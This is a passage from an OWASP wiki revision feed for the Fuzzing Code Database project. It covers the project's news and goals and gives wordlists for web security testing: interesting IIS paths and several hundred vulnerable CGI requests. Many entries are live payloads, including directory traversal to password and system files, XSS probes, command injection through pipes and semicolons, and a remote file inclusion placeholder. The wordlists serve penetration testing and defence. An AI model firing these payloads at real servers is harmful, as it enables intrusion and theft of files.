| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80113</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80113"/>
				<updated>2010-03-18T10:10:20Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (18 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (17 March, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
index.shtml&lt;br /&gt;
x.htw&lt;br /&gt;
x.ida&lt;br /&gt;
x.idq&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
